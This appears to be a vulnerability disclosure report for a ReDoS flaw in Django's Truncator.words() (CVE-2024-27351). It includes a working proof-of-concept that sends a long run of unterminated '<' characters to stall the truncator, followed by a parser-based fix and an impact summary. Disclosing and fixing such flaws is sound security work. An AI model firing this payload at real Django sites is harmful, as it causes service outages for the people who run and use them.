CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words()
Severity: Medium
Vulnerability Details
# TL;DR
**CVE-2024-27351**: Potential regular expression denial-of-service in `django.utils.text.Truncator.words()`
# Details:
The `django.utils.text.Truncator.words()` method (with `html=True`) and the `truncatewords_html` template filter were subject to a potential regular expression denial-of-service attack using a suitably crafted string (follow-up to CVE-2019-14232 and CVE-2023-43665).
- The `Truncator` class truncates text based on word count.
- When the `html` flag is set, the internal `_truncate_html()` method is used.
- This method relies on regular expressions stored in variables (`re_chars` and `re_words`) to perform the truncation.
- These regular expressions are vulnerable to ReDoS attacks, which can cause significant performance degradation and denial-of-service.
**PoC:**
```python
#!/usr/bin/env python3
import time

from django.utils.text import Truncator

MAX_LENGTH = 65535
payload = '<' * MAX_LENGTH  # unterminated tag openers: no closing '>' anywhere
print('[INFO] %d bytes of payload' % len(payload))
start_time = time.time()
Truncator(payload).words(3, truncate='...', html=True)  # BOOM!
end_time = time.time()
print('[INFO] Truncator().words() took %f seconds' % (end_time - start_time))
```
The impact of this vulnerability may vary depending on the computing environment. In my tests using an AMD Ryzen 7 3700X with 32GB RAM, I observed a notable delay of approximately 40 seconds.
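The upstream fix for this CVE replaced the `re_words`/`re_chars` regular expressions with a dedicated HTML parser; as an added illustration (not Django's code), the truncator below takes the same approach with the standard library's `html.parser`, so a run of unterminated `<` like the payload above is consumed in one linear pass instead of being rescanned for a closing `>` from every position. It assumes a word is any run of non-whitespace characters and unescapes, then re-escapes, text content, which differs in detail from Django's own output.

```python
import html
import re
from html.parser import HTMLParser

class _WordTruncator(HTMLParser):
    """Copy input through until num_words words are seen, then cut and close open tags."""

    VOID = {"br", "hr", "img", "input", "meta", "link", "wbr"}  # never need closing

    def __init__(self, num_words, end_text):
        super().__init__()  # convert_charrefs=True: text reaches handle_data unescaped
        self.remaining, self.end_text = num_words, end_text
        self.out, self.open_tags, self.done = [], [], False

    def handle_starttag(self, tag, attrs):
        if not self.done:
            self.out.append(self.get_starttag_text())  # emit the tag verbatim
            if tag not in self.VOID:
                self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if not self.done and tag in self.open_tags:
            self.open_tags.remove(tag)
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.done:
            return
        for text in re.findall(r"\s+|\S+", data):  # a word is a run of non-space
            if not text.isspace():
                if self.remaining == 0:  # one word too many: cut here
                    while self.out and self.out[-1].isspace():
                        self.out.pop()
                    self.out.append(self.end_text)
                    self.done = True
                    return
                self.remaining -= 1
            self.out.append(html.escape(text, quote=False))  # re-escape text

    def close(self):
        super().close()
        if self.done:  # re-balance tags left open by the cut
            self.out.extend(f"</{t}>" for t in reversed(self.open_tags))
        return "".join(self.out)

def truncate_html_words(text, num_words, end_text="..."):
    """Parser-based word truncation; each input character is examined once."""
    parser = _WordTruncator(num_words, end_text)
    parser.feed(text)
    return parser.close()
```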
## Impact
An attacker could exploit this vulnerability to:
- Consume excessive server resources, causing performance degradation and potential service outages.
- Delay application response times significantly.
## Report Stats
- Report ID: 2402193
- State: Closed
- Substate: resolved
- Upvotes: 20